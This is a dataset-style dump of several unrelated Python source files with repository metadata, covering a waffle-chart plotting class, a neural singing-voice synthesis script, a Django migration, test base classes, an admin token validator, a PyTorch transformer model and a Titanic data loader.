The rounding rule applied when shrinking values to fit the chart size.
'nearest' means "round to nearest, ties to even" rounding mode;
'floor' means round to less of the two endpoints of the interval;
'ceil' means round to greater of the two endpoints of the interval.
[Default 'nearest']
:type rounding_rule: str
"""
_direction_values = {
'NW': {
'column_order': 1,
'row_order': -1,
},
'SW': {
'column_order': 1,
'row_order': 1,
},
'NE': {
'column_order': -1,
'row_order': 1,
},
'SE': {
'column_order': -1,
'row_order': -1,
},
}
def __init__(self, *args, **kwargs):
self.fig_args = {
'values': kwargs.pop('values', []),
'rows': kwargs.pop('rows', None),
'columns': kwargs.pop('columns', None),
'colors': kwargs.pop('colors', None),
'labels': kwargs.pop('labels', None),
'legend': kwargs.pop('legend', {}),
'icons': kwargs.pop('icons', None),
'icon_size': kwargs.pop('icon_size', None),
'icon_set': kwargs.pop('icon_set', 'solid'), # Deprecated
'icon_style': kwargs.pop('icon_style', 'solid'),
'icon_legend': kwargs.pop('icon_legend', False),
'interval_ratio_x': kwargs.pop('interval_ratio_x', 0.2),
'interval_ratio_y': kwargs.pop('interval_ratio_y', 0.2),
'block_aspect_ratio': kwargs.pop('block_aspect_ratio', 1),
'cmap_name': kwargs.pop('cmap_name', 'Set2'),
'title': kwargs.pop('title', None),
'plot_anchor': kwargs.pop('plot_anchor', 'W'),
'plot_direction': kwargs.pop('plot_direction', ''), # Deprecated
'vertical': kwargs.pop('vertical', False),
'starting_location': kwargs.pop('starting_location', 'SW'),
'rounding_rule': kwargs.pop('rounding_rule', 'nearest'),
}
self.plots = kwargs.pop('plots', None)
# If plots is empty, make a single waffle chart
if self.plots is None:
self.plots = {111: self.fig_args}
Figure.__init__(self, *args, **kwargs)
for loc, setting in self.plots.items():
self._waffle(loc, **copy.deepcopy(setting))
# Adjust the layout
self.set_tight_layout(True)
def _waffle(self, loc, **kwargs):
# _pa is the arguments for this single plot
self._pa = kwargs
# Append figure args to plot args
plot_fig_args = copy.deepcopy(self.fig_args)
for arg, v in plot_fig_args.items():
if arg not in self._pa:
self._pa[arg] = v
# Parameter Validation
self._pa['rounding_rule'] = self._pa['rounding_rule'].lower()
if self._pa['rounding_rule'] not in ('nearest', 'ceil', 'floor'):
raise ValueError("Argument rounding_rule should be one of nearest, ceil or floor.")
if len(self._pa['values']) == 0 or not self._pa['rows']:
raise ValueError("Argument values or rows is required.")
self.values_len = len(self._pa['values'])
if self._pa['colors'] and len(self._pa['colors']) != self.values_len:
raise ValueError("Length of colors doesn't match the values.")
# lebels and values
if isinstance(self._pa['values'], dict):
if not self._pa['labels']:
self._pa['labels'] = self._pa['values'].keys()
self._pa['values'] = list(self._pa['values'].values())
if self._pa['labels'] and len(self._pa['labels']) != self.values_len:
raise ValueError("Length of labels doesn't match the values.")
self.ax = self.add_subplot(loc, aspect='equal')
# Alignment of subplots
self.ax.set_anchor(self._pa['plot_anchor'])
self.value_sum = sum(self._pa['values'])
# if column number is not given, use the values as number of blocks
if self._pa['columns'] is None:
self._pa['columns'] = division(self.value_sum, self._pa['rows'], method='ceil')
block_number_per_cat = self._pa['values']
else:
block_number_per_cat = [
division(v * self._pa['columns'] * self._pa['rows'], self.value_sum, method=self._pa['rounding_rule'])
for v in self._pa['values']
]
# Absolute height of the plot
figure_height = 1
block_y_length = figure_height / (
self._pa['rows'] + self._pa['rows'] * self._pa['interval_ratio_y'] - self._pa['interval_ratio_y']
)
block_x_length = self._pa['block_aspect_ratio'] * block_y_length
# Define the limit of X, Y axis
self.ax.axis(
xmin=0,
xmax=(
self._pa['columns'] + self._pa['columns'] * self._pa['interval_ratio_x'] - self._pa['interval_ratio_x']
) * block_x_length,
ymin=0,
ymax=figure_height
)
# Build a color sequence if colors is empty
if not self._pa['colors']:
default_colors = cm.get_cmap(self._pa['cmap_name']).colors
default_color_num = cm.get_cmap(self._pa['cmap_name']).N
self._pa['colors'] = array_resize(array=default_colors, length=self.values_len, array_len=default_color_num)
# Set icons
if self._pa['icons']:
from pywaffle.fontawesome_mapping import icons
# TODO: deprecating icon_set
if self._pa['icon_set'] != 'solid' and self._pa['icon_style'] == 'solid':
self._pa['icon_style'] = self._pa['icon_set']
warnings.warn(
"Parameter icon_set is deprecated and will be removed in future version. Use icon_style instead.",
DeprecationWarning
)
# If icon_set is a string, convert it into a list of same icon. It's length is the label's length
# 'solid' -> ['solid', 'solid', 'solid', ]
if isinstance(self._pa['icon_style'], str):
self._pa['icon_style'] = [self._pa['icon_style'].lower()] * self.values_len
elif set(self._pa['icon_style']) - set(icons.keys()):
raise KeyError('icon_set should be one of {}'.format(', '.join(icons.keys())))
# If icons is a string, convert it into a list of same icon. It's length is the label's length
# '\uf26e' -> ['\uf26e', '\uf26e', '\uf26e', ]
if isinstance(self._pa['icons'], str):
self._pa['icons'] = [self._pa['icons']] * self.values_len
if len(self._pa['icons']) != self.values_len:
raise ValueError("Length of icons doesn't match the values.")
# Replace icon name with Unicode symbols in parameter icons
self._pa['icons'] = [
icons[icon_style][icon_name]
for icon_name, icon_style in zip(self._pa['icons'], self._pa['icon_style'])
]
# Calculate icon size based on the block size
tx, ty = self.ax.transData.transform([(0, 0), (0, block_x_length)])
prop = fm.FontProperties(size=self._pa['icon_size'] or int((ty[1] - tx[1]) / 16 * 12))
plot_direction = self._pa['plot_direction'].upper()
if plot_direction:
warnings.warn(
"Parameter plot_direction is deprecated and will be removed in future version. Use starting_location instead.",
DeprecationWarning
)
starting_location = self._pa['plot_direction'].upper()
else:
# TODO: starting_location will replace plot_direction in 0.3.0
starting_location = self._pa['starting_location'].upper()
try:
column_order = self._direction_values[starting_location]['column_order']
row_order = self._direction_values[starting_location]['row_order']
except KeyError:
raise KeyError("starting_location should be one of 'NW', 'SW', 'NE', 'SE'")
if self.fig_args['vertical']:
block_iter = (
c[::-1]
for c in product(range(self._pa['rows'])[::row_order],
range(self._pa['columns'])[::column_order])
)
else:
block_iter = product(range(self._pa['columns'])[::column_order], range(self._pa['rows'])[::row_order])
# Plot blocks
class_index = 0
block_index = 0
x_full = (1 + self._pa['interval_ratio_x']) * block_x_length
y_full = (1 + self._pa['interval_ratio_y']) * block_y_length
for col, row in block_iter:
if block_number_per_cat[class_index] == 0:
class_index += 1
if class_index > self.values_len - 1:
break
elif block_number_per_cat[class_index] < 0:
raise ValueError("Negative value is not acceptable")
x = x_full * col
y = y_full * row
if self._pa['icons']:
prop.set_file(FONTAWESOME_FILES[self._pa['icon_style'][class_index]])
self.ax.text(
x=x,
y=y,
s=self._pa['icons'][class_index],
color=self._pa['colors'][class_index],
fontproperties=prop
)
else:
self.ax.add_artist(
Rectangle(
xy=(x, y), width=block_x_length, height=block_y_length, color=self._pa['colors'][class_index]
)
)
block_index += 1
if block_index >= sum(block_number_per_cat[:class_index + 1]):
class_index += 1
if class_index > self.values_len - 1:
break
# Add title
if self._pa['title'] is not None:
self.ax.set_title(**self._pa['title'])
# Add legend
if self._pa['labels'] or 'labels' in self._pa['legend']:
labels = self._pa['labels'] or self._pa['legend'].get('labels')
if self._pa['icons'] and self._pa['icon_legend'] is True:
self._pa['legend']['handles'] = [
LEGENDSTYLE[style](color=color, text=icon)
for color, icon, style in zip(self._pa['colors'], self._pa['icons'], self._pa['icon_style'])
]
self._pa['legend']['handler_map'] = HANDLER_MAP
# elif not self._pa['legend'].get('handles'):
elif 'handles' not in self._pa['legend']:
self._pa['legend']['handles'] = [
Patch(color=c, label=str(l)) for c, l in zip(self._pa['colors'], labels)
]
# labels is an alias of legend['labels']
if 'labels' not in self._pa['legend'] and self._pa['labels']:
self._pa['legend']['labels'] = self._pa['labels']
if 'handles' in self._pa['legend'] and 'labels' in self._pa['legend']:
self.ax.legend(**self._pa['legend'])
# Remove borders, ticks, etc.
self.ax.axis('off')
def remove(self):
pass
| 40.537678
| 143
| 0.600834
|
0b4850c4686e6283e180dd8204017aaedd1c4634
| 9,096
|
py
|
Python
|
nnsvs/bin/synthesis.py
|
r9y9/dnnsvs
|
b028f76fd4f081859ec99a2034e0e0dc8ce1a409
|
[
"MIT"
] | 72
|
2020-04-19T16:14:09.000Z
|
2020-05-02T04:02:05.000Z
|
nnsvs/bin/synthesis.py
|
r9y9/dnnsvs
|
b028f76fd4f081859ec99a2034e0e0dc8ce1a409
|
[
"MIT"
] | 1
|
2020-04-19T16:28:03.000Z
|
2020-05-02T13:49:13.000Z
|
nnsvs/bin/synthesis.py
|
r9y9/dnnsvs
|
b028f76fd4f081859ec99a2034e0e0dc8ce1a409
|
[
"MIT"
] | 3
|
2020-04-20T02:34:31.000Z
|
2020-04-26T01:04:35.000Z
|
import os
from os.path import exists, join
import hydra
import joblib
import numpy as np
import pysptk
import pyworld
import torch
from hydra.utils import to_absolute_path
from nnmnkwii.io import hts
from nnmnkwii.postfilters import merlin_post_filter
from nnsvs.gen import (
gen_spsvs_static_features,
gen_world_params,
postprocess_duration,
predict_acoustic,
predict_duration,
predict_timelag,
)
from nnsvs.logger import getLogger
from omegaconf import DictConfig, OmegaConf
from scipy.io import wavfile
from tqdm import tqdm
def synthesis(
config,
device,
label_path,
question_path,
timelag_model,
timelag_config,
timelag_in_scaler,
timelag_out_scaler,
duration_model,
duration_config,
duration_in_scaler,
duration_out_scaler,
acoustic_model,
acoustic_config,
acoustic_in_scaler,
acoustic_out_scaler,
):
# load labels and question
labels = hts.load(label_path).round_()
binary_dict, numeric_dict = hts.load_question_set(
question_path, append_hat_for_LL=False
)
# pitch indices in the input features
# TODO: configuarable
pitch_idx = len(binary_dict) + 1
pitch_indices = np.arange(len(binary_dict), len(binary_dict) + 3)
log_f0_conditioning = config.log_f0_conditioning
# Clipping settings
# setting True by default for backward compatibility
timelag_clip_input_features = (
config.timelag.force_clip_input_features
if "force_clip_input_features" in config.timelag
else True
)
duration_clip_input_features = (
config.duration.force_clip_input_features
if "force_clip_input_features" in config.duration
else True
)
acoustic_clip_input_features = (
config.acoustic.force_clip_input_features
if "force_clip_input_features" in config.acoustic
else True
)
if config.ground_truth_duration:
# Use provided alignment
duration_modified_labels = labels
else:
# Time-lag
lag = predict_timelag(
device,
labels,
timelag_model,
timelag_config,
timelag_in_scaler,
timelag_out_scaler,
binary_dict,
numeric_dict,
pitch_indices,
log_f0_conditioning,
config.timelag.allowed_range,
config.timelag.allowed_range_rest,
timelag_clip_input_features,
)
# Duration predictions
durations = predict_duration(
device,
labels,
duration_model,
duration_config,
duration_in_scaler,
duration_out_scaler,
binary_dict,
numeric_dict,
pitch_indices,
log_f0_conditioning,
duration_clip_input_features,
)
# Normalize phoneme durations
duration_modified_labels = postprocess_duration(labels, durations, lag)
# Predict acoustic features
acoustic_features = predict_acoustic(
device,
duration_modified_labels,
acoustic_model,
acoustic_config,
acoustic_in_scaler,
acoustic_out_scaler,
binary_dict,
numeric_dict,
config.acoustic.subphone_features,
pitch_indices,
log_f0_conditioning,
acoustic_clip_input_features,
)
# Generate WORLD parameters
mgc, lf0, vuv, bap = gen_spsvs_static_features(
duration_modified_labels,
acoustic_features,
binary_dict,
numeric_dict,
acoustic_config.stream_sizes,
acoustic_config.has_dynamic_features,
config.acoustic.subphone_features,
pitch_idx,
acoustic_config.num_windows,
config.frame_period,
config.acoustic.relative_f0,
config.vibrato_scale,
)
if config.acoustic.post_filter:
alpha = pysptk.util.mcepalpha(config.sample_rate)
mgc = merlin_post_filter(mgc, alpha)
f0, spectrogram, aperiodicity = gen_world_params(
mgc, lf0, vuv, bap, config.sample_rate
)
wav = pyworld.synthesize(
f0, spectrogram, aperiodicity, config.sample_rate, config.frame_period
)
return wav
@hydra.main(config_path="conf/synthesis", config_name="config")
def my_app(config: DictConfig) -> None:
global logger
logger = getLogger(config.verbose)
logger.info(OmegaConf.to_yaml(config))
if not torch.cuda.is_available():
device = torch.device("cpu")
else:
device = torch.device(config.device)
# timelag
timelag_config = OmegaConf.load(to_absolute_path(config.timelag.model_yaml))
timelag_model = hydra.utils.instantiate(timelag_config.netG).to(device)
checkpoint = torch.load(
to_absolute_path(config.timelag.checkpoint),
map_location=lambda storage, loc: storage,
)
timelag_model.load_state_dict(checkpoint["state_dict"])
timelag_in_scaler = joblib.load(to_absolute_path(config.timelag.in_scaler_path))
timelag_out_scaler = joblib.load(to_absolute_path(config.timelag.out_scaler_path))
timelag_model.eval()
# duration
duration_config = OmegaConf.load(to_absolute_path(config.duration.model_yaml))
duration_model = hydra.utils.instantiate(duration_config.netG).to(device)
checkpoint = torch.load(
to_absolute_path(config.duration.checkpoint),
map_location=lambda storage, loc: storage,
)
duration_model.load_state_dict(checkpoint["state_dict"])
duration_in_scaler = joblib.load(to_absolute_path(config.duration.in_scaler_path))
duration_out_scaler = joblib.load(to_absolute_path(config.duration.out_scaler_path))
duration_model.eval()
# acoustic model
acoustic_config = OmegaConf.load(to_absolute_path(config.acoustic.model_yaml))
acoustic_model = hydra.utils.instantiate(acoustic_config.netG).to(device)
checkpoint = torch.load(
to_absolute_path(config.acoustic.checkpoint),
map_location=lambda storage, loc: storage,
)
acoustic_model.load_state_dict(checkpoint["state_dict"])
acoustic_in_scaler = joblib.load(to_absolute_path(config.acoustic.in_scaler_path))
acoustic_out_scaler = joblib.load(to_absolute_path(config.acoustic.out_scaler_path))
acoustic_model.eval()
# Run synthesis for each utt.
question_path = to_absolute_path(config.question_path)
if config.utt_list is not None:
in_dir = to_absolute_path(config.in_dir)
out_dir = to_absolute_path(config.out_dir)
os.makedirs(out_dir, exist_ok=True)
with open(to_absolute_path(config.utt_list)) as f:
lines = list(filter(lambda s: len(s.strip()) > 0, f.readlines()))
logger.info("Processes %s utterances...", len(lines))
for idx in tqdm(range(len(lines))):
utt_id = lines[idx].strip()
label_path = join(in_dir, f"{utt_id}.lab")
if not exists(label_path):
raise RuntimeError(f"Label file does not exist: {label_path}")
wav = synthesis(
config,
device,
label_path,
question_path,
timelag_model,
timelag_config,
timelag_in_scaler,
timelag_out_scaler,
duration_model,
duration_config,
duration_in_scaler,
duration_out_scaler,
acoustic_model,
acoustic_config,
acoustic_in_scaler,
acoustic_out_scaler,
)
wav = np.clip(wav, -32768, 32767)
if config.gain_normalize:
wav = wav / np.max(np.abs(wav)) * 32767
out_wav_path = join(out_dir, f"{utt_id}.wav")
wavfile.write(
out_wav_path, rate=config.sample_rate, data=wav.astype(np.int16)
)
else:
assert config.label_path is not None
logger.info("Process the label file: %s", config.label_path)
label_path = to_absolute_path(config.label_path)
out_wav_path = to_absolute_path(config.out_wav_path)
wav = synthesis(
config,
device,
label_path,
question_path,
timelag_model,
timelag_config,
timelag_in_scaler,
timelag_out_scaler,
duration_model,
duration_config,
duration_in_scaler,
duration_out_scaler,
acoustic_model,
acoustic_config,
acoustic_in_scaler,
acoustic_out_scaler,
)
wav = wav / np.max(np.abs(wav)) * (2 ** 15 - 1)
wavfile.write(out_wav_path, rate=config.sample_rate, data=wav.astype(np.int16))
def entry():
my_app() # pylint: disable=no-value-for-parameter
if __name__ == "__main__":
my_app() # pylint: disable=no-value-for-parameter
| 31.915789
| 88
| 0.645119
|
0ed88cc85dc69ea210a47756ab3eb4c478e9882e
| 1,497
|
py
|
Python
|
api/addresses/migrations/0002_auto_20200326_1420.py
|
django-doctor/lite-api
|
1ba278ba22ebcbb977dd7c31dd3701151cd036bf
|
[
"MIT"
] | null | null | null |
api/addresses/migrations/0002_auto_20200326_1420.py
|
django-doctor/lite-api
|
1ba278ba22ebcbb977dd7c31dd3701151cd036bf
|
[
"MIT"
] | null | null | null |
api/addresses/migrations/0002_auto_20200326_1420.py
|
django-doctor/lite-api
|
1ba278ba22ebcbb977dd7c31dd3701151cd036bf
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2.11 on 2020-03-26 14:20
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("addresses", "0001_initial"),
]
operations = [
migrations.AddField(
model_name="address",
name="address",
field=models.CharField(
blank=True, default=None, help_text="Used for addresses not in the UK", max_length=256, null=True
),
),
migrations.AlterField(
model_name="address",
name="address_line_1",
field=models.CharField(blank=True, default=None, max_length=50, null=True),
),
migrations.AlterField(
model_name="address",
name="address_line_2",
field=models.CharField(blank=True, default=None, max_length=50, null=True),
),
migrations.AlterField(
model_name="address", name="city", field=models.CharField(default=None, max_length=50, null=True),
),
migrations.AlterField(
model_name="address",
name="postcode",
field=models.CharField(blank=True, default=None, max_length=10, null=True),
),
migrations.AlterField(
model_name="address",
name="region",
field=models.CharField(blank=True, default=None, max_length=50, null=True),
),
migrations.AlterModelTable(name="address", table="address",),
]
| 33.266667
| 113
| 0.585838
|
be7ccf7dcce0254ee4c379415b2784bd6fc85edc
| 357
|
py
|
Python
|
mayan/apps/documents/tests/base.py
|
sophiawa/Mayan-EDMS
|
42f20576d0c690b645a60bf53c5169cda4264231
|
[
"Apache-2.0"
] | null | null | null |
mayan/apps/documents/tests/base.py
|
sophiawa/Mayan-EDMS
|
42f20576d0c690b645a60bf53c5169cda4264231
|
[
"Apache-2.0"
] | 10
|
2021-03-19T23:48:12.000Z
|
2022-03-12T00:41:49.000Z
|
mayan/apps/documents/tests/base.py
|
sophiawa/Mayan-EDMS
|
42f20576d0c690b645a60bf53c5169cda4264231
|
[
"Apache-2.0"
] | 1
|
2020-12-17T02:35:09.000Z
|
2020-12-17T02:35:09.000Z
|
from mayan.apps.common.tests.base import BaseTestCase, GenericViewTestCase
from .mixins import DocumentTestMixin
class GenericDocumentTestCase(DocumentTestMixin, BaseTestCase):
"""Base test case when testing models or classes"""
class GenericDocumentViewTestCase(DocumentTestMixin, GenericViewTestCase):
"""Base test case when testing views"""
| 29.75
| 74
| 0.809524
|
205434e509ff3c8a8b9e92e31c8d11260d548367
| 897
|
py
|
Python
|
open-hackathon/src/hackathon/admin/admin_mgr.py
|
Fendoe/LABOSS
|
7f90e4627196ada7caf235115c0cc6fbd183c379
|
[
"Apache-2.0"
] | null | null | null |
open-hackathon/src/hackathon/admin/admin_mgr.py
|
Fendoe/LABOSS
|
7f90e4627196ada7caf235115c0cc6fbd183c379
|
[
"Apache-2.0"
] | null | null | null |
open-hackathon/src/hackathon/admin/admin_mgr.py
|
Fendoe/LABOSS
|
7f90e4627196ada7caf235115c0cc6fbd183c379
|
[
"Apache-2.0"
] | null | null | null |
import sys
sys.path.append("..")
from hackathon.database.models import *
from hackathon.log import log
from hackathon.database import db_adapter
from datetime import datetime, timedelta
from hackathon.constants import HTTP_HEADER
from flask import request, g
class AdminManager(object):
def __init__(self, db_adapter):
self.db = db_adapter
def __validate_token(self, token):
t = self.db.find_first_object(AdminToken, token=token)
if t is not None and t.expire_date >= datetime.utcnow():
return t.admin
return None
def validate_request(self):
if HTTP_HEADER.TOKEN not in request.headers:
return False
admin = self.__validate_token(request.headers[HTTP_HEADER.TOKEN])
if admin is None:
return False
g.admin = admin
return True
admin_manager = AdminManager(db_adapter)
| 24.243243
| 73
| 0.690078
|
d6b7dbaf5e43b0d5b627baca1d0c2f6cadbbc9ce
| 10,078
|
py
|
Python
|
model_pytorch.py
|
sohuren/pytorch-openai-transformer-lm
|
55ba4d78407ae12c7454dc8f3342f476be3dece5
|
[
"MIT"
] | 1
|
2018-07-08T19:18:44.000Z
|
2018-07-08T19:18:44.000Z
|
model_pytorch.py
|
sohuren/pytorch-openai-transformer-lm
|
55ba4d78407ae12c7454dc8f3342f476be3dece5
|
[
"MIT"
] | null | null | null |
model_pytorch.py
|
sohuren/pytorch-openai-transformer-lm
|
55ba4d78407ae12c7454dc8f3342f476be3dece5
|
[
"MIT"
] | null | null | null |
import copy
import json
import math
import re
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.parameter import Parameter
def gelu(x):
return 0.5 * x * (1 + torch.tanh(math.sqrt(2 / math.pi) * (x + 0.044715 * torch.pow(x, 3))))
def swish(x):
return x * torch.sigmoid(x)
ACT_FNS = {
'relu': nn.ReLU,
'swish': swish,
'gelu': gelu
}
class LayerNorm(nn.Module):
"Construct a layernorm module in the OpenAI style (epsilon inside the square root)."
def __init__(self, n_state, e=1e-5):
super(LayerNorm, self).__init__()
self.g = nn.Parameter(torch.ones(n_state))
self.b = nn.Parameter(torch.zeros(n_state))
self.e = e
def forward(self, x):
u = x.mean(-1, keepdim=True)
s = (x - u).pow(2).mean(-1, keepdim=True)
x = (x - u) / torch.sqrt(s + self.e)
return self.g * x + self.b
class Conv1D(nn.Module):
def __init__(self, nf, rf, nx):
super(Conv1D, self).__init__()
self.rf = rf
self.nf = nf
if rf == 1: # faster 1x1 conv
w = torch.empty(nx, nf)
nn.init.normal_(w, std=0.02)
self.w = Parameter(w)
self.b = Parameter(torch.zeros(nf))
else: # was used to train LM
raise NotImplementedError
def forward(self, x):
if self.rf == 1:
size_out = x.size()[:-1] + (self.nf,)
x = torch.addmm(self.b, x.view(-1, x.size(-1)), self.w)
x = x.view(*size_out)
else:
raise NotImplementedError
return x
class Attention(nn.Module):
def __init__(self, nx, n_ctx, cfg, scale=False):
super(Attention, self).__init__()
n_state = nx # in Attention: n_state=768 (nx=n_embd)
# [switch nx => n_state from Block to Attention to keep identical to TF implem]
assert n_state % cfg.n_head == 0
self.register_buffer('b', torch.tril(torch.ones(n_ctx, n_ctx)).view(1, 1, n_ctx, n_ctx))
self.n_head = cfg.n_head
self.split_size = n_state
self.scale = scale
self.c_attn = Conv1D(n_state * 3, 1, nx)
self.c_proj = Conv1D(n_state, 1, nx)
self.attn_dropout = nn.Dropout(cfg.attn_pdrop)
self.resid_dropout = nn.Dropout(cfg.resid_pdrop)
def _attn(self, q, k, v):
w = torch.matmul(q, k)
if self.scale:
w = w / math.sqrt(v.size(-1))
w = w * self.b + -1e9 * (1 - self.b) # TF implem method: mask_attn_weights
w = nn.Softmax(dim=-1)(w)
w = self.attn_dropout(w)
return torch.matmul(w, v)
def merge_heads(self, x):
x = x.permute(0, 2, 1, 3).contiguous()
new_x_shape = x.size()[:-2] + (x.size(-2) * x.size(-1),)
return x.view(*new_x_shape) # in Tensorflow implem: fct merge_states
def split_heads(self, x, k=False):
new_x_shape = x.size()[:-1] + (self.n_head, x.size(-1) // self.n_head)
x = x.view(*new_x_shape) # in Tensorflow implem: fct split_states
if k:
return x.permute(0, 2, 3, 1)
else:
return x.permute(0, 2, 1, 3)
def forward(self, x):
x = self.c_attn(x)
query, key, value = x.split(self.split_size, dim=2)
query = self.split_heads(query)
key = self.split_heads(key, k=True)
value = self.split_heads(value)
a = self._attn(query, key, value)
a = self.merge_heads(a)
a = self.c_proj(a)
a = self.resid_dropout(a)
return a
class MLP(nn.Module):
def __init__(self, n_state, cfg): # in MLP: n_state=3072 (4 * n_embd)
super(MLP, self).__init__()
nx = cfg.n_embd
self.c_fc = Conv1D(n_state, 1, nx)
self.c_proj = Conv1D(nx, 1, n_state)
self.act = ACT_FNS[cfg.afn]
self.dropout = nn.Dropout(cfg.resid_pdrop)
def forward(self, x):
h = self.act(self.c_fc(x))
h2 = self.c_proj(h)
return self.dropout(h2)
class Block(nn.Module):
def __init__(self, n_ctx, cfg, scale=False):
super(Block, self).__init__()
nx = cfg.n_embd
self.attn = Attention(nx, n_ctx, cfg, scale)
self.ln_1 = LayerNorm(nx)
self.mlp = MLP(4 * nx, cfg)
self.ln_2 = LayerNorm(nx)
def forward(self, x):
a = self.attn(x)
n = self.ln_1(x + a)
m = self.mlp(n)
h = self.ln_2(n + m)
return h
class TransformerModel(nn.Module):
""" Transformer model """
def __init__(self, cfg, vocab=40990, n_ctx=512):
super(TransformerModel, self).__init__()
self.vocab = vocab
self.embed = nn.Embedding(vocab, cfg.n_embd)
self.drop = nn.Dropout(cfg.embd_pdrop)
block = Block(n_ctx, cfg, scale=True)
self.h = nn.ModuleList([copy.deepcopy(block) for _ in range(cfg.n_layer)])
self.decoder = nn.Linear(cfg.n_embd, vocab, bias=False)
self.decoder.weight = self.embed.weight # Tied weights
self.clf_dropout = nn.Dropout2d(cfg.clf_pdrop) # To reproduce the noise_shape parameter of TF implementation
nn.init.normal_(self.embed.weight, std=0.02)
def forward(self, x):
x = x.view(-1, x.size(-2), x.size(-1))
e = self.embed(x)
h = e.sum(dim=2)
for block in self.h:
h = block(h)
return h
class LMHead(nn.Module):
""" Language Model Head for the transformer """
def __init__(self, model, cfg):
super(LMHead, self).__init__()
self.n_embd = cfg.n_embd
embed_shape = model.embed.weight.shape
self.decoder = nn.Linear(embed_shape[1], embed_shape[0], bias=False)
self.decoder.weight = model.embed.weight # Tied weights
def forward(self, h):
# Truncated Language modeling logits (we remove the last token)
h_trunc = h[:, :-1].contiguous().view(-1, self.n_embd)
lm_logits = self.decoder(h_trunc)
return lm_logits
class ClfHead(nn.Module):
""" Classifier Head for the transformer """
def __init__(self, clf_token, cfg):
super(ClfHead, self).__init__()
self.n_embd = cfg.n_embd
self.clf_token = clf_token
self.dropout = nn.Dropout2d(cfg.clf_pdrop) # To reproduce the noise_shape parameter of TF implementation
self.linear = nn.Linear(cfg.n_embd, 1)
nn.init.normal_(self.linear.weight, std=0.02)
nn.init.normal_(self.linear.bias, 0)
def forward(self, h, x):
# Classification logits
clf_h = h.view(-1, self.n_embd)
flat = x[:, :, :, 0].contiguous().view(-1)
clf_h = clf_h[flat == self.clf_token, :]
clf_h = clf_h.view(-1, x.size(1), self.n_embd, 1)
clf_h = self.dropout(clf_h)
clf_h = clf_h.view(-1, self.n_embd)
clf_logits = self.linear(clf_h)
return clf_logits.view(-1, x.size(1))
class DoubleHeadModel(nn.Module):
""" Transformer with language model and classification heads """
def __init__(self, cfg, clf_token, vocab=40990, n_ctx=512):
super(DoubleHeadModel, self).__init__()
self.transformer = TransformerModel(cfg, vocab=vocab, n_ctx=n_ctx)
self.lm_head = LMHead(self.transformer, cfg)
self.clf_head = ClfHead(clf_token, cfg)
def forward(self, x):
h = self.transformer(x)
lm_logits = self.lm_head(h)
clf_logits = self.clf_head(h, x)
return lm_logits, clf_logits
def load_openai_pretrained_model(model, n_ctx=-1, n_special=-1, n_transfer=12, n_embd=768, path='./model/',
path_names='./'):
# Load weights from TF model
print("Loading weights...")
names = json.load(open(path_names + 'parameters_names.json'))
shapes = json.load(open(path + 'params_shapes.json'))
offsets = np.cumsum([np.prod(shape) for shape in shapes])
init_params = [np.load(path + 'params_{}.npy'.format(n)) for n in range(10)]
init_params = np.split(np.concatenate(init_params, 0), offsets)[:-1]
init_params = [param.reshape(shape) for param, shape in zip(init_params, shapes)]
if n_ctx > 0:
init_params[0] = init_params[0][:n_ctx]
if n_special > 0:
init_params[0] = np.concatenate(
[init_params[1],
(np.random.randn(n_special, n_embd) * 0.02).astype(np.float32),
init_params[0]
], 0)
else:
init_params[0] = np.concatenate(
[init_params[1],
init_params[0]
], 0)
del init_params[1]
if n_transfer == -1:
n_transfer = 0
else:
n_transfer = 1 + n_transfer * 12
init_params = [arr.squeeze() for arr in init_params]
try:
assert model.embed.weight.shape == init_params[0].shape
except AssertionError as e:
e.args += (model.embed.weight.shape, init_params[0].shape)
raise
model.embed.weight.data = torch.from_numpy(init_params[0])
for name, ip in zip(names[1:n_transfer], init_params[1:n_transfer]):
name = name[6:] # skip "model/"
assert name[-2:] == ":0"
name = name[:-2]
name = name.split('/')
pointer = model
for m_name in name:
if re.fullmatch(r'[A-Za-z]+\d+', m_name):
l = re.split(r'(\d+)', m_name)
else:
l = [m_name]
pointer = getattr(pointer, l[0])
if len(l) >= 2:
num = int(l[1])
pointer = pointer[num]
try:
assert pointer.shape == ip.shape
except AssertionError as e:
e.args += (pointer.shape, ip.shape)
raise
pointer.data = torch.from_numpy(ip)
class dotdict(dict):
"""dot.notation access to dictionary attributes"""
__getattr__ = dict.get
__setattr__ = dict.__setitem__
__delattr__ = dict.__delitem__
DEFAULT_CONFIG = dotdict({
'n_embd': 768,
'n_head': 12,
'n_layer': 12,
'embd_pdrop': 0.1,
'attn_pdrop': 0.1,
'resid_pdrop': 0.1,
'afn': 'gelu',
'clf_pdrop': 0.1})
| 32.827362
| 117
| 0.583052
|
21d82f22a9d26170891ff7c50f456ea5e5870f65
| 2,455
|
py
|
Python
|
.history/src/data/data_20191018132944.py
|
bkraft4257/kaggle_titanic
|
f29ea1773773109a867278c001dbd21a9f7b21dd
|
[
"MIT"
] | null | null | null |
.history/src/data/data_20191018132944.py
|
bkraft4257/kaggle_titanic
|
f29ea1773773109a867278c001dbd21a9f7b21dd
|
[
"MIT"
] | null | null | null |
.history/src/data/data_20191018132944.py
|
bkraft4257/kaggle_titanic
|
f29ea1773773109a867278c001dbd21a9f7b21dd
|
[
"MIT"
] | null | null | null |
import pandas as pd
from typing import Union
from pathlib import Path
from nameparser import HumanName
class ExtractData:
title_translator = {
"Mlle.": "Mrs.",
"Mme.": "Mrs.",
"Sir.": "Mr.",
"Ms.": "Mrs.",
"": "Mr.",
"Col.": "Mr.",
"Capt.": "Mr.",
"Lady.": "Mrs.",
"the Countess. of": "Mrs.",
}
def __init__(self, filename: Union[str, Path], drop_columns=None):
# """Extract Training Data from file or Path
# Arguments:
# filename {[str]} -- Filename of CSV data file containing data.
# drop_columns -- Columns in dataframe that should be dropped.
# """
if drop_columns is None:
drop_columns = ["age", "cabin", "name", "ticket"]
self.filename = filename
self.drop_columns = drop_columns
self.all_label_columns = ["survived"]
self.all_feature_columns = [
"pclass",
"name",
"sex",
"age",
"sibsp",
"parch",
"ticket",
"fare",
"cabin",
"embarked",
]
self.Xy_raw = None
self.Xy = None
self.extract_raw()
self.Xy = self.Xy_raw.copy()
self.extract_title()
self.extract_last_name()
def extract_raw(self):
"""
Extracts data from a CSV file.
Returns:
pd.DataFrame -- [description]
"""
Xy_raw = pd.read_csv(self.filename)
Xy_raw.columns = Xy_raw.columns.str.lower().str.replace(" ", "_")
Xy_raw["pclass"] = Xy_raw["pclass"].astype("category")
self.Xy_raw = Xy_raw.set_index("passengerid")
